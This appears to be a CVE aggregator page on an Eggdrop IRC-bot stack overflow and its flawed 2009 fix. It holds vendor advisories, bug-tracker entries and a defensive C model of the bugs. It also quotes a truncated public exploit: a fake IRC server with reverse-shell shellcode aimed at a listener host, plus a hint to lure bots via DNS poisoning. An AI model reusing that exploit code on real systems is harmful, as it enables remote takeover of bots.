CVE-2007-2807
Published: 2007-05-22
Priority: P3 · 36 · medium · 6.8 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: public exploit code available (see the Exploit-DB entries below)
EPSS: 9.98% (95.0th percentile)
Stack-based buffer overflow in mod/server.mod/servmsg.c (spelled "servrmsg.c" in the CVE text) in Eggdrop 1.6.18, and possibly earlier, allows user-assisted, remote IRC servers to execute arbitrary code via a long private message. The overflow is in the gotmsg() handler, where the CTCP payload of a PRIVMSG is copied into the fixed-size ctcpbuf stack buffer; the attack is server-side, so the bot has to be made to connect to an IRC server the attacker controls (the public exploit is a fake ircd and suggests DNS cache poisoning or a .jump to get the bot there).
Affected
63 ranges · showing 25 (rows with no version data collapsed)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | eggdrop | < eggdrop 1.6.18-1.1 (bookworm) | eggdrop 1.6.18-1.1 (bookworm) |
| debian | eggdrop | < eggdrop 1.6.19-1.2 (bookworm) | eggdrop 1.6.19-1.2 (bookworm) |
| eggheads | eggdrop | — | — |
| eggheads | eggdrop | >= 0 < 1.6.19-1.2 | 1.6.19-1.2 |
CVSS provenance
nvd · v2.0 · 6.8 MEDIUM · AV:N/AC:M/Au:N/C:P/I:P/A:P
osv · 6.8 MEDIUM
vendor_debian · 6.8 MEDIUM
vendor_redhat · 6.8 MEDIUM
Red Hat · vendor_redhat · 2009-05-26 · CVSS 6.8
CVE-2009-1789 [MEDIUM] eggdrop DoS (crash)
mod/server.mod/servmsg.c in Eggheads Eggdrop and Windrop 1.6.19 and earlier allows remote attackers to cause a denial of service (crash) via a crafted PRIVMSG that causes an empty string to trigger a negative string length copy. NOTE: this issue exists because of an incorrect fix for CVE-2007-2807.
Debian · vendor_debian · 2009 · CVSS 6.8
CVE-2009-1789 [MEDIUM] eggdrop
mod/server.mod/servmsg.c in Eggheads Eggdrop and Windrop 1.6.19 and earlier allows remote attackers to cause a denial of service (crash) via a crafted PRIVMSG that causes an empty string to trigger a negative string length copy. NOTE: this issue exists because of an incorrect fix for CVE-2007-2807.
Scope: local
bookworm: resolved (fixed in 1.6.19-1.2)
bullseye: resolved (fixed in 1.6.19-1.2)
forky: resolved (fixed in 1.6.19-1.2)
sid: resolved (fixed in 1.6.19-1.2)
trixie: resolved (fixed in 1.6.19-1.2)
Debian · vendor_debian · 2007 · CVSS 6.8
CVE-2007-2807 [MEDIUM] eggdrop
Stack-based buffer overflow in mod/server.mod/servrmsg.c in Eggdrop 1.6.18, and possibly earlier, allows user-assisted, remote IRC servers to execute arbitrary code via a long private message.
Scope: local
bookworm: resolved (fixed in 1.6.18-1.1)
bullseye: resolved (fixed in 1.6.18-1.1)
forky: resolved (fixed in 1.6.18-1.1)
sid: resolved (fixed in 1.6.18-1.1)
trixie: resolved (fixed in 1.6.18-1.1)
GHSA · ghsa_unreviewed · 2022-05-02 · CVSS 6.8
CVE-2009-1789 [MEDIUM] GHSA-v2pc-r45v-vq4h: mod/server
mod/server.mod/servmsg.c in Eggheads Eggdrop and Windrop 1.6.19 and earlier allows remote attackers to cause a denial of service (crash) via a crafted PRIVMSG that causes an empty string to trigger a negative string length copy. NOTE: this issue exists because of an incorrect fix for CVE-2007-2807.
GHSA · ghsa_unreviewed · 2022-05-01
CVE-2007-2807 [MEDIUM] GHSA-p35w-cvx7-7v49: Stack-based buffer overflow in mod/server
Stack-based buffer overflow in mod/server.mod/servrmsg.c in Eggdrop 1.6.18, and possibly earlier, allows user-assisted, remote IRC servers to execute arbitrary code via a long private message.
OSV · osv · 2009-05-26 · CVSS 6.8
CVE-2009-1789 [MEDIUM] mod/server
mod/server.mod/servmsg.c in Eggheads Eggdrop and Windrop 1.6.19 and earlier allows remote attackers to cause a denial of service (crash) via a crafted PRIVMSG that causes an empty string to trigger a negative string length copy. NOTE: this issue exists because of an incorrect fix for CVE-2007-2807.
OSV · osv · 2007-05-22 · CVSS 6.8
CVE-2007-2807 [MEDIUM] Stack-based buffer overflow in mod/server
Stack-based buffer overflow in mod/server.mod/servrmsg.c in Eggdrop 1.6.18, and possibly earlier, allows user-assisted, remote IRC servers to execute arbitrary code via a long private message.
No detection rules found.
Exploit-DB · exploitdb · 2009-05-15 · CVSS 6.8
CVE-2009-1789 [MEDIUM] Eggdrop/Windrop 1.6.19 - ctcpbuf Remote Crash
---
eggdrop/windrop remote crash vulnerability
From: Thomas Sader
Date: Fri, 15 May 2009 05:54:08 +0200
Affected software
eggdrop (1.6.19 only, not 1.6.19+ctcpfix)
windrop (1.6.19 only, not 1.6.19+ctcpfix)
all eggdrop/windrop versions and packages which apply Nico Golde's
patch for CVE-2007-2807/SA25276 (see [1])
Vulnerability details
The SA25276 patch ([1]) uses strncpy to fix a buffer overflow vulnerability
in src/mod/server.mod/servmsg.c (gotmsg). The last argument is not checked
for being non-negative, but that can happen if ctcpbuf is "". That causes
a remote crash vulnerability to be exploited by
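The two bugs as a runnable model, added here for this page (it is example code, not Eggdrop's servmsg.c or gotmsg(), and it does not reproduce either the 2007 exploit or the 2009 crash message): the 1.6.18 pattern of an unbounded copy of a PRIVMSG's CTCP payload into a fixed-size stack buffer (CVE-2007-2807), the incomplete fix in which strncpy()'s length argument goes negative for an empty ctcpbuf (CVE-2009-1789), and a hardened handler that bounds the copy and rejects the empty CTCP. The 512-byte buffer, the function names, the constructed sample messages and the `strlen(ctcpbuf) - 1` arithmetic standing in for the patch's actual length expression are assumptions made for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the bug pattern described on this page; it is NOT
 * Eggdrop's servmsg.c. Buffer size, helper names and the incomplete fix's
 * length arithmetic are assumptions made for the example. */
#define CTCPBUF_SIZE 512

/* Locate the first CTCP segment of a PRIVMSG payload ("\001PING 1\001").
 * Returns the payload length and sets *start to its first byte, or sets
 * *start to NULL when the message carries no CTCP at all. */
static size_t ctcp_payload(const char *msg, const char **start)
{
    const char *p = strchr(msg, '\001');
    if (p == NULL) {
        *start = NULL;
        return 0;
    }
    p++;                                  /* skip the opening \001 */
    const char *end = strchr(p, '\001');
    if (end == NULL)
        end = p + strlen(p);              /* unterminated CTCP runs to the NUL */
    *start = p;
    return (size_t)(end - p);
}

/* 1.6.18 pattern (CVE-2007-2807): the handler strcpy()s the CTCP payload
 * into a fixed-size stack buffer. Instead of performing the overflow, this
 * reports how many bytes (NUL included) would land past the buffer. */
size_t unbounded_copy_overflow_bytes(const char *msg)
{
    const char *s;
    size_t n = ctcp_payload(msg, &s);
    if (s == NULL)
        return 0;
    return n + 1 > CTCPBUF_SIZE ? (n + 1) - CTCPBUF_SIZE : 0;
}

/* Incomplete fix (CVE-2009-1789), modelled: strncpy() is used, but its
 * length is derived from an expression like strlen(ctcpbuf) - 1 with no
 * check for an empty ctcpbuf. size_t is unsigned, so "" yields SIZE_MAX
 * and strncpy() then reads and writes far beyond both buffers. */
size_t incomplete_fix_copy_length(const char *ctcpbuf)
{
    return strlen(ctcpbuf) - 1;           /* wraps to SIZE_MAX for "" */
}

/* Hardened handler: bounded copy into the stack buffer plus an explicit
 * rejection of the empty CTCP ("\001\001") that broke the first fix.
 * Returns the number of bytes kept, or -1 if nothing was copied. */
int handle_privmsg_hardened(const char *msg)
{
    char ctcpbuf[CTCPBUF_SIZE];           /* the buffer the 1.6.18 code overran */
    const char *s;
    size_t n = ctcp_payload(msg, &s);

    if (s == NULL || n == 0)
        return -1;                        /* no CTCP, or an empty one */
    if (n >= sizeof ctcpbuf)
        n = sizeof ctcpbuf - 1;           /* truncate instead of spilling */
    memcpy(ctcpbuf, s, n);
    ctcpbuf[n] = '\0';
    return (int)strlen(ctcpbuf);
}

/* Constructed oversized PRIVMSG payload: \001 + 600 'A' + \001. */
const char *sample_long_privmsg(void)
{
    static char msg[604];
    if (msg[0] == '\0') {
        msg[0] = '\001';
        memset(msg + 1, 'A', 600);
        msg[601] = '\001';
        msg[602] = '\0';
    }
    return msg;
}

int main(void)
{
    const char *normal = "\001PING 1\001";   /* constructed sample */
    const char *empty  = "\001\001";         /* constructed: empty CTCP */

    printf("overflow bytes, long msg:    %zu\n", unbounded_copy_overflow_bytes(sample_long_privmsg()));
    printf("incomplete-fix length, \"\":  %zu\n", incomplete_fix_copy_length(""));
    printf("hardened, normal: %d\n", handle_privmsg_hardened(normal));
    printf("hardened, empty:  %d\n", handle_privmsg_hardened(empty));
    printf("hardened, long:   %d\n", handle_privmsg_hardened(sample_long_privmsg()));
    return 0;
}
```

Build with `cc -Wall -o ctcp_model ctcp_model.c`. The unbounded case is reported rather than executed so the program itself does not crash; the point of `incomplete_fix_copy_length("")` is that a "negative" length never reaches strncpy() as a negative number, it arrives as SIZE_MAX, which is why the 2009 patch replaced the arithmetic with a copy bounded by the destination size and why the hardened handler checks for the empty payload before doing any arithmetic on its length.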
Exploit-DB · exploitdb · 2007-10-10
CVE-2007-2807 Eggdrop Server Module Message Handling - Remote Buffer Overflow
---
/*
Eggdrop Server Module Message Handling Remote Buffer Overflow Vulnerability
https://www.securityfocus.com/bid/24070
discovered by Bow Sineath
tested on eggdrop 1.6.18 / linux 2.4
-exploit is a fake ircd
replace shellcode.. strip 0x00,0x0a and a few more probably.
remember to add \n at end of shellcode.
poison some dns cache or .jump
play.
-bangus/magnum
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define LISTENPORT 6667
#define BACKLOG 3
#define RETADDR 0xbffff7b9
/*
* linux/x86/shell_reverse_tcp - 99 bytes
* http://www.metasploit.com
* Encoder: x86/shikata_ga_nai
* LPORT=4444, LHOST=10.0.0.250
*/
unsigned char shellcode[] =
"\xbf\x1a\x2f\xf0\x55\xdb\xc9\xd9\x74\x24\xf4\x5b\x31\x
Bugzilla · bugzilla · 2009-05-26 · CVSS 6.8
CVE-2009-1789 [MEDIUM] eggdrop DoS (crash)
mod/server.mod/servmsg.c in Eggheads Eggdrop and Windrop 1.6.19 and earlier allows remote attackers to cause a denial of service (crash) via a crafted PRIVMSG that causes an empty string to trigger a negative string length copy. NOTE: this issue exists because of an incorrect fix for CVE-2007-2807.
http://secunia.com/advisories/35104
Discussion:
Created eggdrop tracking bugs for this issue
CVE-2009-1789 Affects: F10 [bug #502651]
CVE-2009-1789 Affects: F8 [bug #502652]
CVE-2009-1789 Affects: F9 [bug #502653]
CVE-2009-1789 Affects: Fdevel [bug #502654]
---
The upstream fix should be here:
http://cvs.eggheads.org/viewvc/viewvc.cgi/eggdrop1.6/src/mod/server.mod/servmsg.c?r1=1.100&r2=1.101
---
Package: eggdrop-1.6.19-4.fc12 Tag: dist-f12 Status: compl
Bugzilla · bugzilla · 2009-05-15 · CVSS 6.8
CVE-2007-2807 [MEDIUM] Eggdrop: Incomplete fix for CVE-2007-2807
A stack-based buffer overflow in mod/server.mod/servrmsg.c, which might allow user-assisted, remote IRC servers to execute arbitrary code via a long private message, was originally found in Eggdrop 1.6.18, and possibly earlier versions (CVE-2007-2807). Thomas Sader reported that the original fix for the issue was incomplete (it introduced another flaw).
References:
http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/68341
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=528778
Upstream report:
http://www.eggheads.org/downloads/
Proposed patch (against latest Eggdrop version):
http://www.eggheads.org/redirect.php?url=ftp://ftp.eggheads.org/pub/eggdrop/patches/official/1.6/eggdrop1.6.19%2Bctcpfix.patch.gz
Discussion:
*** This bug has bee
References
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=427157
http://osvdb.org/36237
http://secunia.com/advisories/25276
http://secunia.com/advisories/26727
http://secunia.com/advisories/26826
http://secunia.com/advisories/27989
http://secunia.com/advisories/28347
http://secunia.com/advisories/35690
http://security.gentoo.org/glsa/glsa-200709-07.xml
http://securitytracker.com/id?1018700
http://www.debian.org/security/2008/dsa-1448
http://www.debian.org/security/2009/dsa-1826
http://www.eggheads.org/bugzilla/show_bug.cgi?id=462
http://www.mandriva.com/security/advisories?name=MDKSA-2007:175
http://www.securityfocus.com/bid/24070
https://www.redhat.com/archives/fedora-package-announce/2007-December/msg00336.html
https://www.redhat.com/archives/fedora-package-announce/2007-December/msg00348.html